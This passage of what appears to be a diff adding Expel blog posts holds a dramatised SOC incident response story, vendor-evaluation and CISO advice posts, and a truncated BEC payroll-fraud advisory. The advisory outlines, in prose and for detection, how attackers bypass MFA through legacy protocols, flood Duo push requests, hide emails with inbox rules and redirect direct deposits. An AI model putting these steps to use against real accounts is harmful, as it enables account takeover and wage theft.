require more time and digging. Jenni launches a \u201cPermaZoom\u201d 24\u00d77 video call with the rest of the team. \u201cAnyone else see that one in the medium queue? It doesn\u2019t look right.\u201d More analysts jump in to help. DeShawn, always eager to lend a hand, takes a look. \u201cI\u2019m gonna see if any other hosts are talking to that domain,\u201d Tucker chimes in. Chris offers to scope the environment for other instances of the Word document. The Expel security operations center (SOC) is very much a team. Analysts bring their own capabilities and knowledge sets to the table and investigations quickly take shape around the collective strengths of the group. One analyst examines the endpoint within Microsoft Defender for Endpoint while another looks at IP/domain prevalence. A third examines recent phishing activity. It\u2019s not uncommon to have three or more analysts collaborating on the same incident. The collaboration between our analysts also extends to you. The Expel Workbench lets our customers see everything we see in real time \u2014 not after the fact. Workbench gives them potent investigative and data collection tools to power their own daily SOC activities. Jose, an Expel phishing analyst, says he just saw an email submission containing a Word document similar to the \u201ctax help\u201d one identified in the alert. \u201cCan someone grab the Word doc off the host?\u201d he asks. Analysts on the phishing team are pros at triaging suspicious documents. The faster Jose can get that file, the faster he can provide the support Jenni and the team need. Jose gets Chris\u2019 help scoping for evidence of file execution while he compiles a list of users who received the email. While our services offer tremendous value individually, integrating them provides even more coverage against an attack \u2014 a benefit highlighted by this case. The root cause of most attacks? Phishing emails. MDR and phishing services together make up the Expel SOC, and they communicate extensively, maximizing effective response across our customer base. Since Jose and other phishing analysts are at the front edge of so many attacks, they can alert MDR analysts sooner about potential business email compromise (BEC). Attacker trends are commonly noted by phishing analysts, who pass the information on to their MDR counterparts. Overall, having both services in place means fuller coverage and quicker response. Back to the story. Thankfully this customer, Vandelay Industries, provides the Expel SOC with Live Response access via their EDR console, meaning Jose can directly acquire the file for fuller analysis. Detonating the document in our sandbox confirms that the document isn\u2019t, in fact, the \u201cTax Planning Help Guide\u201d its name suggests (we know \u2014 we\u2019re as shocked as you are). \u201cHey, Jenni,\u201d says Jose, \u201cthis sandbox execution looks bad.\u201d Jenni looks at the endpoint timeline (since the malicious document was first opened). \u201cI\u2019m guessing that JPEG isn\u2019t really a JPEG,\u201d she mumbles, as she runs the hash through VirusTotal. Remediation: incident to fix \u201cI\u2019m gonna spin this up into an incident,\u201d Jenni says. \u201cThey need to isolate that host.\u201d For many incidents, automation baked into our process lets Jenni instantly both notify the customer about what we\u2019re seeing and suggest remediation steps. More hosts, hashes, and domains will be added to the list of suggested remediation steps as the SOC gathers indicators of compromise (IOCs). \u201cDear Vandelay Industries, Today At 5:47 UTC Windows Defender detected \u2018Regsvr32.exe\u2019 being spawned from `Winword.exe\u2019 on host DESKTOP-3AB921 and making network connections to BadDomain.com\u201d\u2026 Contain the host \u201cDESKTOP-3AB921\u201d Block the malicious Word document \u201cTax Planning Help Guide.docx\u201d with SHA256 hash \u201cba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad\u201d Sinkhole the domain BadDomain.com Block emails from \u201cBadEmails.com\u201d with subject line \u201cDownload the Tax Planning Help Guide\u201d We will update you if we identify any other involved hosts. Within 20 seconds of the incident\u2019s creation, our customer has meaningful action they can use to nip the attack in the bud. And yes, we\u2019re tooting our own horn here. We\u2019re good at what we do and we do it quickly. \u201cWhich customer was that incident for again, Jenni?\u201d asks Deshawn. \u201cI see two more alerts in the medium queue that look similar.\u201d \u201cVandelay Industries.\u201d Jenni replies. \u201cIs that the \u201cDESKTOP-3AB921\u201d host you\u2019re seeing, or a new one?\u201d \u201cSame customer, but new hosts\u2026 both of them. I\u2019ll drop those in the incident and assign those remediations to Vandelay,\u201d DeShawn adds. \u201cThanks,\u201d she says, \u201cI\u2019m gonna make this incident \u2018critical\u2019 and update the customer in Slack. Would you mind scoping those hosts for anything new\u2026domains or otherwise? Whoa. Vandelay already yanked that first host off the network. That was quick!\u201d At this point, much of the heavy lifting is done. Jenni and another member of the Global Response Team (GRT) will continue to deep dive into anything that\u2019s still not fully understood. They\u2019ll ask questions like: How many users received the email and how many clicked on the malicious attachment? What\u2019s the source of the email? How many hosts are involved? What network activity did we see? Was there any evidence of persistence or lateral movement? Did the malicious files successfully execute? Should the hosts be reimaged? New IOCs are added as they are discovered and any new alerts that come through are attached to the Incident. The GRT is composed of senior and principal-level analysts who serve as incident responders for critical incidents. These are our most seasoned analysts and they help validate all aspects of the compromise. Next question: \u201cHow can we help the client avoid this next time?\u201d Resilience: prevention The team shared remediation steps with Vandelay and Jenni awaits confirmation. David has joined the Zoom call as a member of the GRT to help Jenni finalize things. Jenni tells David that, \u201cSo far, we\u2019re seeing execution on three hosts from what appears to be \u2018click-through\u2019 by users into a phishing campaign. That led to a malicious Word file. I\u2019ve updated the customer but am still waiting for them to respond. Two of the hosts are still online. The incident is \u201ccritical\u201d because of the multiple hosts, so they should have received a notification by now, but still no word. I\u2019ll ping their account rep and have them reach out by phone.\u201d David thinks out loud. \u201cSo they don\u2019t have auto-containment in Workbench enabled, Let me get into the console and poke around.\u201d Elapsed time since we first issued customer recommendations: 40 minutes. This situation is tricky, as we\u2019re dealing with multiple hosts and decreased weekend staffing by the customer. What can we do when there\u2019s an active threat but the customer is out-of-pocket? Good news: clients can opt into our automated remediation service, which can automatically contain hosts as needed. Unfortunately, Vandelay isn\u2019t taking advantage of this feature. \u201cI think we\u2019ve added all the relevant artifacts to the remediation actions,\u201d David explains. \u201cI\u2019m checking to see if we can suggest anything that\u2019s helpful for the future. Looks like they\u2019ve been recommended previously to turn-off allowing \u2018wscript.exe\u2019 to open shell scripts. I\u2019m seeing that recommendation nine, ten\u202611 times total, over the past year. I\u2019ll add it to the Resilience section again.\u201d This particular customer had a total of 20 endpoint-related security incidents within its environment last year, more than half of which would have been avoided with the proper wscript.exe resilience policy in place. While resilience steps are not always easy to implement, they can make a substantive, positive impact on a customer\u2019s security posture. Expel SOC analysts are up early anyway and available 24/7, but most people don\u2019t want to be awakened on a Sunday morning by a critical incident. Your weekend on-call folks, not to mention your CISO, will thank you for preventing incidents like this. PagerDuty automation, enabling auto-containment and completing resilience recommendations are small investments that can be made to improve response times for future incidents. PagerDuty can wake you up if something goes wrong. Auto-contain authorization lets us isolate compromised hosts even if you don\u2019t wake up. Completed resilience action can help you avoid these issues altogether. Let\u2019s say you want to take a deeper look into your environment. Are my remediation steps working as expected? What else is \u201cRegsvr32.exe\u201d doing on our endpoints? Do we have any coverage gaps? Threat hunting: validation and high-level understanding [The next day; the familiar sound chimes as Bryan joins the Zoom call] \u201cHey gang, is Jenni on? She asked me to pop in\u2026something about a wscript.exe hunt?\u201d Bryan knows both the red and blue side of cyber and now gets to employ those years of experience in a threat hunting capacity. Our hunting service, a big step beyond detection and response, lets us dig deep into customer data to find not only detection gaps and suspicious events, but also to verify resilience. Our hunting catalog easily expands to scope for both confirmation of resilience and absence of emergent IOCs. We ask questions like: Was multi-factor authentication (MFA) really enabled for all users? Is the Server Message Block (SMB) protocol accessible on public facing servers? What Amazon Web Services (AWS) region should we not see in this environment? Does Java.exe ever have any suspicious child processes? These questions are crucial. If you think you\u2019re hardening your infrastructure, don\u2019t you want to be sure? \u201cHey Bryan, I\u2019m here,\u201d Jenni chimes in. \u201cVandelay had a thing yesterday where \u2018wscript.exe\u2019 was involved. I wanted to see if we can do some hunting on how commonly that process is used in their environment. Also, I\u2019d love to be able to verify that shell scripts no longer get opened with wscript? We\u2019ve recommended that resilience action to them a bunch of times. It really helps if they\u2019re able to get a better picture across their systems. Is that something we can do?\u201d A lot of in-house security teams are so busy they rarely have time to baseline or research their own environments. Questions like, \u201cWhat parent process typically spawns wscript.exe?\u201d can slip down the priority list. And \u201cWhich users and domains are most commonly seen executing Okta impersonation events?\u201d Or \u201cWhat AWS users do we see commonly using long term AccesskeyIDs?\u201d Expel threat hunting can provide some much needed insight into these and other endpoint, SaaS, and cloud questions. \u201cHey Jenni, glad to jump on. Have they ever confirmed implementation of that resilience step?\u201d Bryan asks. \u201cI wonder if it\u2019s something they\u2019ve simply chosen not to do.\u201d Jenni says, \u201cI saw back in October they marked that action as complete. I\u2019m wondering if they pushed the policy but didn\u2019t quite get the protection they\u2019d intended. We\u2019re still seeing it run, obviously. Do we have a hunt we could employ to scope wscript activity across all their hosts?\u201d \u201cThe Historical Scripting Interpreter hunt would shed some light on that for them,\u201d suggests Bryan. \u201cThey\u2019re using Windows Defender right? I\u2019ll ping their account rep to see if they want to get the process going. Thanks for bringing this up.\u201d\u201cYeah they are using Defender,\u201d she replies, \u201cand thanks for doing that. Let me know if you need anything from this end.\u201d \u201cThanks Jenni, I\u2019ll keep you posted on how it progresses. Might have you run the analysis when the hunt kicks off. Great catch on the incident, by the way.\u201d The Expel threat hunting service iterates around a historical POV and a broader range of detection complexity. We conduct regular monthly hunts on your tech and infrastructure, and we run periodic IOC hunts as new threats emerge. Even more fun: with Expel, you can even take advantage of evolving draft hunts for testing and development. We afford our hunting customers better visibility across their whole landscape. Whether its cloud infra, SaaS applications, network, or endpoint-related hunts, our coverage includes a wide array of technologies. For example: AWS\u2019 EC2 modifications hunt Duo\u2019s Suspicious Duo Push activity hunt Cloud apps\u2019 data center logins hunt Cloud infra\u2019s Azure Successful Brute Force hunt Azure Successful Bruteforce hunt We also provide additional insights and resilience recommendations to help reduce risk exposure in the future. Threat hunting allows you to validate that you\u2019re as secure as you\u2019re trying to be, and provides a path forward on things that still need some attention. What else can hunting do? And, where do we go from here? Completing the circle: better detection \u201cWe\u2019re definitely seeing it come through the queue,\u201d says Bryan, \u201cbut I want us to elevate its severity to high. We\u2019ve seen this technique spike this month in particular. The Vandelay incident really highlighted the recent uptick in this usage of a JPEG file as an obfuscated script file. OSINT calls it a Shorse Attack. I don\u2019t know where they get these names\u2026\u201d \u201cSo basically,\u201d Peter replies, \u201cif the command line contains \u2018wscript\u2019 plus\u2018.jpg\u2019 or \u2018.jpeg\u2019 we categorize it as a HIGH. Right? Peter, an Expel senior detection and response analyst, joins Bryan to make sure the activity gets categorized appropriately. If the detection logic produces higher-fidelity signal, we want to elevate the severity to get analysts\u2019 attention more quickly. \u201cExactly,\u201d Bryan says. \u201cWe ended up running that query across another five or six customers and found that it\u2019s a lot more prevalent than the months prior. This adjustment should surface these alerts to an analyst even quicker.\u201d Peter nods. \u201cSounds good. That change should be live within the hour. I\u2019ll holler if I have any more questions.\u201d \u201cThanks, Peter. I\u2019ll check back in a few days. This Shorse stuff makes me wonder if this might be a good long-term hunt for our catalog. Basically, wscript.exe being run containing any atypical file types in the command line. I\u2019ll let you know what I find.\u201d Whether it comes out of our threat hunting experience, a phishing campaign, or new threat intel, Expel constantly adjusts the dials on our detection capabilities. We try to harness every ounce of analyst attention and brain power toward customer alerts, and we never want to waste a scrap of what we learn. Completing the feedback loop is critical to properly facing a rapidly evolving threat landscape. Tomorrow, even if attackers start using electric toothbrushes to launch attacks, we\u2019ll be able to respond. What end-to-end coverage means to us We dramatized the Vandelay incident for readability, but we see events like this all the time at Expel. Like, every single week. And each time we work through the alert \u2192 investigation \u2192 phishing \u2192 incident \u2192 hunting \u2192 better detection \u2192 alert cycle (and its various permutations), we get faster and better, to make you safer. Jenni, Girish, Tucker, Jose, Chris, DeShawn, David, Bryan, and Peter are just a few members of the team keeping eyes-on-glass all-day-every-day. This is 360\u00b0 security at its best. You\u2019re invited to test drive our comprehensive MDR, phishing and hunting services to experience the full benefits." +} \ No newline at end of file diff --git a/does-your-mssp-or-mdr-provider-know-how-to-manage.json b/does-your-mssp-or-mdr-provider-know-how-to-manage.json new file mode 100644 index 0000000000000000000000000000000000000000..31341b7e0aacc29f36b21dc1bfe33fd7ec8907f6 --- /dev/null +++ b/does-your-mssp-or-mdr-provider-know-how-to-manage.json @@ -0,0 +1,6 @@ +{ + "title": "Does your MSSP or MDR provider know how to manage ...", + "url": "https://expel.com/blog/does-your-mssp-or-mdr-provider-know-how-to-manage-your-signals/", + "date": "Apr 11, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Does your MSSP or MDR provider know how to manage your signals? Security operations \u00b7 4 MIN READ \u00b7 JAMES JURAN \u00b7 APR 11, 2019 \u00b7 TAGS: How to / Managed security / Selecting tech / Tools We\u2019ve said it before but it\u2019s worth repeating \u2026 when you\u2019re evaluating an MSSP or MDR, you\u2019ve gotta make sure the provider can integrate with the tech you already have and make it work harder for you. (Pro tip: If your MSSP or MDR immediately suggests that you run out and buy a chest of shiny new security tools, they\u2019re probably not the right fit for you .) Here are four questions to ask your prospective provider to find out if they\u2019re up to the challenge of managing your fleet of security signals. Question 1: How do you get data from my existing tech? Most security devices or services stream data via syslog or WebSocket. At first glance, this seems like a great way to collect all those disparate security signals \u2014 especially because your provider doesn\u2019t have to write extra code. Before you hit the \u201ceasy\u201d button, dig a little deeper with your provider. Ask some questions like: How hard is it for me as a customer to set that up? How will I know that it\u2019s working or when it breaks (like when my network admin accidentally removes the firewall rule that allowed my data to get to your collector)? What happens when your collector is down? Will the one high-priority alert that indicates attackers are in my network get dropped on the floor and delay discovery of the intrusion? Can I ask the device or service for more information to support an investigation, or can I only receive the information that you chose to put in the streaming protocol? Instead of streaming data, we prefer to poll for alerts. Yes, it takes more work, but it\u2019s much more reliable and it lets us audit our data ingestion processes to make sure we\u2019re not missing anything mission critical (BTW, we\u2019ve got a whole post on setting up a rockin\u2019 data auditing process ). Here are a few reasons why we think polling for data is more effective and reliable: When there\u2019s an interruption for any reason, you and your provider know what data was received and what wasn\u2019t, so you can pick up where you left off. And if something goes wrong (it happens once in a while) your provider can easily \u201cset the clock back\u201d and re-ingest data. You can conduct an audit to double check that you and your provider received the alerts they were supposed to receive. (We\u2019re big fans of checking our work!) It\u2019s super easy for you as the customer to set this up with your provider. For most devices or services, all you have to do is create an API key with the right permissions and the provider handles the rest. There are some security product and service vendors that have more sophisticated protocols than raw syslog and WebSockets that provide these same benefits \u2014 your vendor should gladly support those too. Question 2: What tools do you use to make sure my signals are getting to you? With lots of security signals coming in from different directions, you\u2019ve gotta make sure your provider can verify that they\u2019re receiving the signals from all your tech. In our case, we combine tools like Datadog , PagerDuty , Sentry , Google\u2019s Stackdriver Trace , and Slack to keep a close watch on what\u2019s going on with every device and let the right people know when there\u2019s a problem. Ask your provider what tools they use to monitor device health, how quickly they\u2019ll detect if something isn\u2019t working and how they\u2019ll communicate that to you. Take it one step further and find a way to check your provider\u2019s work. One of our guiding principles here is, \u201cShow me metrics or it didn\u2019t happen.\u201d Intuition and anecdotes are useful but they don\u2019t prove what happened or form the basis for monitoring. For each of our customers, we have an automatically-generated Datadog dashboard for each customer\u2019s security devices. This gives us an easy, comprehensive way to look at a device\u2019s performance over time: And because troubleshooting a problem shouldn\u2019t require logging into a production database, we built a Slack bot that quickly gives our device integration engineers the lowdown on what\u2019s happening with each device and makes it easy for them to pivot to other systems for deeper investigation: Ask your provider how they check device health and request a first-hand look at the tools they use to make sure they\u2019re receiving all your signals (then, see if they have a solid process in place in case something goes wrong). Question 3: How do you build integrations with new devices? When your service provider builds an integration with a new security product, do they reinvent the wheel every time (and find new ways to make mistakes)? Or do they have a process to build each integration faster and better than the last one? TL;DR: Your provider needs a framework that handles all the complexities of receiving signal. That framework should handle all the complexities of alert polling, populating metrics and handling errors. This lets the integration developer focus on actions that are specific to the new security product. Question 4: What happens when things break? The old adage is true \u2026 nobody is perfect all the time. But does your provider tell you about problems as they\u2019re happening \u2014 on a public status page for systemic problems or with a personal phone call, email or Slack message when the issue is specific to your tech? And once the problem is fixed, what\u2019s the provider doing to reduce the risk of that same issue happening again? Even with the best reviews, testing and monitoring, problems still happen. When they do, a good provider will \u201c fix the problem two ways .\u201d Solving the immediate problem as quickly as possible to mitigate the impact is the obvious part. The part that takes discipline is coming back and figuring out how to reduce the risk of the problem from ever occurring again, how to catch it sooner when it does and identifying easier ways to diagnose and fix it. How can you get a better understanding of how your provider will act when things don\u2019t go as planned? Ask to see their latest after-action report on something that failed. Or, ask to talk to one of their customers who experienced a problem with the service and then ask that customer how the provider handled it. Diving deeper Want more ideas on what to ask your potential provider? We could give you a whole laundry list of Qs to ask when evaluating an MSSP or MDR (this is one of our favorite topics, in case you couldn\u2019t tell). In fact, we\u2019ve got more of those questions \u2014 lots of \u2018em \u2014 here on our blog. Check out \u201c 12 revealing questions to ask when evaluating an MSSP or MDR provider \u201d and \u201c 12 ways to tell if your managed security provider won\u2019t suck next year .\u201d" +} \ No newline at end of file diff --git a/don-t-blow-it-5-ways-to-make-the-most-of-the-chance-to.json b/don-t-blow-it-5-ways-to-make-the-most-of-the-chance-to.json new file mode 100644 index 0000000000000000000000000000000000000000..62792c5965ad7205a44645eb61385d75d8645724 --- /dev/null +++ b/don-t-blow-it-5-ways-to-make-the-most-of-the-chance-to.json @@ -0,0 +1,6 @@ +{ + "title": "Don't blow it - 5 ways to make the most of the chance to ...", + "url": "https://expel.com/blog/5-ways-to-make-the-most-of-chance-to-revamp-security-posture/", + "date": "May 28, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Don\u2019t blow it \u2014 5 ways to make the most of the chance to revamp your security posture Security operations \u00b7 4 MIN READ \u00b7 MICHAEL SUTTON \u00b7 MAY 28, 2019 \u00b7 TAGS: CISO / Managed security / Management / Planning Michael Sutton is the founder of StoneMill Ventures, which invests in disruptive cybersecurity companies. Michael has more than 20 years\u2019 experience working in the security space, spending nearly 11 years as the Chief Information Security Officer (CISO) at Zscaler, and holding security-focused roles at companies like Hewlett-Packard, Verisign and Ernst & Young. I occasionally hear from CISOs that a moment in time comes when they suddenly have a blank slate and therefore the opportunity to fundamentally revamp their security posture. This blank slate appears for a variety of reasons: maybe the CISO is new to the company, a breach occurred, the company\u2019s taking on new investment capital, or the company\u2019s preparing to go public. Whatever the driver, this is a golden opportunity for a CISO \u2014 one that shouldn\u2019t be squandered. In fact, I found myself in this situation a few years ago. Here\u2019s what I learned about making the most of this opportunity, along with some guidance as to where to start when you have an empty canvas in front of you. Build a foundation Even though you\u2019ve probably got plenty of opinions on what\u2019s needed to build (or rebuild) a great security program \u2013 and it\u2019s great that the company is now interested in investing in security \u2014 avoid the temptation to dive in head first and start making changes immediately. All good things do come to an end, which is why it\u2019s critical that you first establish a game plan that you\u2019ll continually reference as the basis for any decisions you make going forward. No matter how much flexibility you may have at a given point in time, you\u2019ll always have someone to answer to and you\u2019ll need to show progress against committed milestones. So where do you start? To set yourself and the company up for long-term success, select and build your program around an established cybersecurity framework. Doing so will keep you on track, assist with prioritization and provide a clear roadmap that others can easily follow so they know where you\u2019re headed. There are plenty of cybersecurity frameworks available and you should take some time to identify the one that\u2019ll work best for you. In my experience, the NIST Cybersecurity Framework is now the most widely adopted among U.S. enterprises and is flexible enough to meet the needs of most orgs. Whatever framework you choose, it\u2019s important to first map your existing security controls against the framework. You\u2019ll be able to show everyone where deficiencies exist and help with prioritizing resources. This mapping will serve as a baseline that you can measure yourself against \u2013 it\u2019s a great way to show progress as you make security investments. Seek objective opinions As much as we want to think we have all the answers, seeking external and objective viewpoints will help validate your assessments. Consider external pen tests or risk assessments, which you can usually get at a relatively low cost if you negotiate small initial contracts with larger ones to follow once your overall plan is approved. It\u2019s much easier to defend your assessment of the org\u2019s security posture or to seek additional budget if you can point to empirical evidence where weak controls already exposed your org to risk. Make friends Security is a team sport. Even if you\u2019ve secured budget for new resources, collaborating with other teams is essential. For example, selecting a source code scanning tool won\u2019t be valuable if the developers don\u2019t want to use it, or if you selected one that doesn\u2019t fit into their existing workflow. And good luck navigating any security audit without the cooperation of other departments. That\u2019s why you\u2019ve got to build those alliances early and often. Make sure that others in the org view the security team as one that can help them achieve their objectives, not hold them back. Having allies is critical to your success. Position security as a business driver Too many executives view the security team as a cost center and, even worse, the part of the company that slows them down. While you shouldn\u2019t expect to ever be seen as a profit center, you should absolutely position security as a business driver. How exactly can you do that? Work with other teams to understand their needs (when in doubt, re-read the \u201cMake friends\u201d section above) and determine how security can help. For example, has your sales team run into roadblocks with certain deals because of regulatory and compliance issues? That\u2019s an area where you can and should lend a hand. Or have you heard employees complaining about not being able to use a certain tool or service because they\u2019re blocked by security and IT? Don\u2019t ever lower your security posture to appease your colleagues, but in my experience there\u2019s usually a way to meet employees\u2019 needs without negatively impacting your risk profile if you take the time to understand what they\u2019re trying to achieve. All you need to do is sit down with them and take the time to listen. Ask for regular feedback Security is never done. That\u2019s why it\u2019s critical to revisit your initial mapping and make sure the gaps you identified at the beginning of the process are closing and that investments are paying off. Over time, you\u2019ll probably need to create additional metrics to show your progress. These metrics will differ depending on your goals, but it\u2019ll help you communicate to and get support from your executive team and the board. Every enterprise has a moment of clarity when it comes to security. Whether that arrives via the installation of a new security-conscious CEO or from landing on the front page of The New York Times thanks to a high-profile breach, make sure you\u2019ve got a game plan for moving forward. Step up to the plate, follow these tips, and you\u2019ll be sure to knock it out of the park." +} \ No newline at end of file diff --git a/don-t-dam-upstream-ways-to-build-a-feedback-loop.json b/don-t-dam-upstream-ways-to-build-a-feedback-loop.json new file mode 100644 index 0000000000000000000000000000000000000000..ecff2a0b7e5da942ecba7ed5bfb624c9c42bf11e --- /dev/null +++ b/don-t-dam-upstream-ways-to-build-a-feedback-loop.json @@ -0,0 +1,6 @@ +{ + "title": "Don't dam upstream: ways to build a feedback loop", + "url": "https://expel.com/blog/dont-dam-upstream-ways-build-feedback-loop/", + "date": "Sep 14, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Don\u2019t dam upstream: ways to build a feedback loop Talent \u00b7 2 MIN READ \u00b7 YANEK KORFF \u00b7 SEP 14, 2017 \u00b7 TAGS: Employee retention / Great place to work / Management I was interviewing a candidate for a security analyst role and asked one of my two favorite questions: \u201cTalk to me about a time\u2026 or a project\u2026 where, looking back on it you think to yourself: if I never have to do that again, it\u2019ll be too soon. What was that misery, and what made it miserable?\u201d The candidate had a strong technical background and his experience was right on the mark. He also had an exceptionally relevant response. He described working at a federal SOC. Overall, it was a great learning experience, he said. They were constantly finding bad stuff and he learned a lot from his peers, but neither he nor his co-workers had any ability to influence detection. A separate team handled that. And \u2014 for security reasons \u2014 neither team could talk to the other. Hah! So, every week he\u2019d see the same false positives he\u2019d flagged the week before\u2026 and the week before that. Over time, this bred a feeling of helplessness, boredom and eventually burnout. His story reminded me of an article I\u2019d read in the Harvard Business Review years ago by the CEO of Johnsonville Sausage. He was struggling with performance problems and described his employees as \u201cso bored by their jobs that they made thoughtless, dumb mistakes. They showed up in the morning, halfheartedly did what they were told, and then went home.\u201d Sounds terrible (side note: the thought of quality problems in sausage makes me a bit queasy).In any case, it took years, but that CEO finally came to an important realization: \u201cThose who implement a decision and live with its consequences are the best people to make it.\u201d The result? They changed their quality control system. Turns out, this practice applies directly to security operations and probably a lot of other disciplines as well. The people who live with the consequences of detection must be integral to deciding how intelligence and methodologies are applied in the first place. Without this feedback loop, you\u2019re stuck with bad sausage. Back to the interview. We were hiring for a role where the candidate would be in the exact same position he\u2019d just said he never wanted to repeat. At the time, the feedback loop in our SOC was broken and the required fixes weren\u2019t trivial. Even though he was an exceptionally well qualified candidate, we chose not to proceed because he\u2019d have been miserable.These disconnects aren\u2019t unusual. \u201cJust add a feedback loop\u201d is too simplistic an answer. Solving this problem in security operations is much harder. Many analysts in a SOC lack the experience to effectively drive detection. Those who do have the experience typically don\u2019t work in the SOC (or at least, not on shift) and may have forgotten exactly how frustrating this situation can be. Still, it\u2019s not hopeless. If you find yourself in this situation, here are four options to build in a feedback loop. 1. Align incentives If the SOC and detection/intel team report into different managers, make it clear to your detection team\u2019s manager that her success is measured by the SOC manager\u2019s enthusiastic support. 2. Get physical Is your SOC sectioned off from the rest of your security team? Reserve seats for your sister team\u2019s personnel. If there aren\u2019t enough seats, rotate people through. 3. Make the pain transparent By measuring the time wasted chasing dead ends (or even the volume of dead ends) and tying those to root causes, you\u2019ll make it clear when adjustments are needed upstream. 4. Celebrate improvement As you use metrics to drive change in your detection methodologies, reward your teams when the needle meaningfully moves in the right direction. Common wins help unify teams. \u2014 This is the second part of a five part series on key areas of focus to improve security team retention. Read the introduction, 5 ways to keep your security nerds happy , or continue to part three ." +} \ No newline at end of file diff --git a/election-security-why-to-care-and-what-to-do-about-it.json b/election-security-why-to-care-and-what-to-do-about-it.json new file mode 100644 index 0000000000000000000000000000000000000000..547e5ee9aa646e09116c771f30901f4aa7b8c5ff --- /dev/null +++ b/election-security-why-to-care-and-what-to-do-about-it.json @@ -0,0 +1,6 @@ +{ + "title": "Election security: Why to care and what to do about it", + "url": "https://expel.com/blog/election-security-why-care-what-to-do/", + "date": "Apr 7, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Election security: Why to care and what to do about it Security operations \u00b7 3 MIN READ \u00b7 BRUCE POTTER \u00b7 APR 7, 2020 \u00b7 TAGS: Framework / Guide / NIST / Planning If someone asked you to think about elections, what\u2019s the first thing that comes to mind? For most people, it\u2019s that moment when you show up at your polling place and cast your ballot. But the reality is that the system is so much larger than that \u2014 elections are about far more than the voting machine and election security is about more than securing a single piece of equipment. Consider voter registration efforts and election rolls, all of the information voters have digested leading up to voting day that have influenced their decisions \u2026 And don\u2019t forget what happens after you cast your vote and how the results are tallied. Now combine all those moments in the election security supply chain with a global health crisis \u2014 think sending absentee ballots to everyone in a given state so they can vote in the primary \u2014 and you\u2019ve got even more potential election-related vulnerabilities on your hands. To understand and mitigate election security, it\u2019s essential to consider the entire supply chain. The parts of our election security \u201csupply chain\u201d There are six distinct parts of the election supply chain (see below) and they all have the potential to be compromised at different times (and in different ways) during the election cycle. The TL;DR? The potential for election compromise starts long before Election Day. Which is exactly why we created a handbook about the election security supply chain. We know there are other election security guides out there \u2014 but most of them focus only on a single part of the election process, like voting infrastructure. In our latest guide , we zoom in on each step along the election supply chain and look at potential points of compromise including how a crafty attacker could \u201chack\u201d each piece along the chain. For each part of the election supply chain we also offer up ideas about how public and private sector organizations\u2014even individual, well-informed citizens who are planning to vote\u2014can better protect our elections from attacks. Why it matters Whether you work in security, are an election official or just happened to be, well, an informed voter, there are plenty of ways we can all band together to collectively improve the security posture of our elections systems. And no matter your role in the process, maintaining or improving the integrity of our democracy is in everybody\u2019s best interest. What we (yes, you) can do about it By focusing on even a few key proactive security measures, our election security supply chain would be far better protected than it is today. Here are just a few ideas on how we can work together to improve election security: Educate yourself (and others). Whether you\u2019re making sure your election officials know how to transfer election results to a website (ahem, Iowa) or sending your security analysts to relevant training sessions or conferences, educating the people who impact each part of the election supply chain is paramount. And if you\u2019re a regular ol\u2019 voter? Fact check what you read about candidates and issues, and get your information from multiple, varied sources. Learn about (and implement) security best practices and frameworks. If you\u2019ve worked in security for any length of time, chances are good that you\u2019ve heard of the NIST Cyber Security Framework (CSF) . The NIST CSF is one of the many frameworks out there that can help you gauge your effectiveness when it comes to security and think about how you want your efforts to change or grow. So whether it\u2019s NIST or something else, pick a framework and use it to understand where and how you can get better. Pressure test your systems. You know what helps when bad things start happening? Having a plan and knowing who needs to do what when something goes sideways. Create an incident response plan \u2014better yet, create a plan, emulate an incident and practice what you might do if that bad thing happened in real life. Grab your copy of our election security handbook Want to read more? Click the button below to download your copy of our election security handbook right now. Download the election security handbook" +} \ No newline at end of file diff --git a/emerging-threat-bec-payroll-fraud-advisory.json b/emerging-threat-bec-payroll-fraud-advisory.json new file mode 100644 index 0000000000000000000000000000000000000000..4ea56ae2bfadda9e8e5ab685952705627b386be1 --- /dev/null +++ b/emerging-threat-bec-payroll-fraud-advisory.json @@ -0,0 +1,6 @@ +{ + "title": "Emerging Threat: BEC Payroll Fraud Advisory", + "url": "https://expel.com/blog/emerging-threat-bec-payroll-fraud-advisory/", + "date": "Jul 27, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Emerging Threat: BEC Payroll Fraud Advisory Security operations \u00b7 2 MIN READ \u00b7 JONATHAN HENCINSKI, JENNIFER MAYNARD, RAY PUGH, KYLE PELLETT, ANDREW BENTLE, DAVID BLANTON, DESHAWN LUU AND BEN BRIGIDA \u00b7 JUL 27, 2022 \u00b7 TAGS: MDR In July 2022, our security operations center (SOC) observed Business Email Compromise (BEC) attacks across multiple customer environments, targeting access to human capital management systems\u2014specifically, Workday. The goal of these attacks? Payroll and direct deposit fraud. In this post, we\u2019ll share the attack chain we\u2019ve seen across multiple environments and high-level tips for spotting this class of fraud. How they get in An attacker begins by compromising a user\u2019s Microsoft Office 365 (O365) or Okta account, often using BasicAuthentication (BAV2ROPC, IMAP, POP3) to bypass multi-factor authentication (MFA)\u2014usually occurring from VPN and hosting IPs. From there, attackers can access the victim\u2019s Workday account directly through Okta, the compromised password, or a password reset email. In scenarios where the attacker compromises an O365 account and doesn\u2019t have direct access to Workday via single sign on (SSO), an attacker will read available documentation on payroll systems and new employee payroll enrollment. The goal, in most cases, is to identify how to gain access to human capital management systems using new employee setup procedures, or password reset requests. (Side note: we\u2019ve also seen cases where attackers don\u2019t use BasicAuthentication, and the compromised user authorizes an MFA notification for the attacker using brute force Duo push requests. This involves an attacker continuously sending Duo push notifications to the victim until they accept.) Attackers can then create inbox rules within the compromised user\u2019s email account to delete or move emails related to workday.com, myworkday.com, and/or emails with keywords (like \u201cpayroll\u201d or \u201cassistance needed\u201d). To prolong this access, attackers can enroll trusted devices through an organization\u2019s mobile or endpoint device management platform (for example, Microsoft InTune). Now, the attacker can modify the compromised user\u2019s settings to add the attacker\u2019s direct deposit information\u2014depositing the victim\u2019s paycheck into the attacker\u2019s account. How to spot it So what can you do to detect\u2014and hopefully prevent\u2014these costly attacks? Here\u2019s what we recommend: For security teams: Alert for new Outlook Inbox-rules created with suspicious names (two to three characters in length, or repeating characters could be a clue). Also watch out for certain keywords, like \u201cpayroll\u201d and \u201cWorkday\u201d Alert for multiple Okta sessions from the same user with multiple, non-mobile operating systems Alert for potential brute force Duo push requests Review any authentication using legacy protocol (UA = Bav2ropc) into O365 as it may represent MFA bypass. (P.S. Have you disabled legacy protocols yet?) For 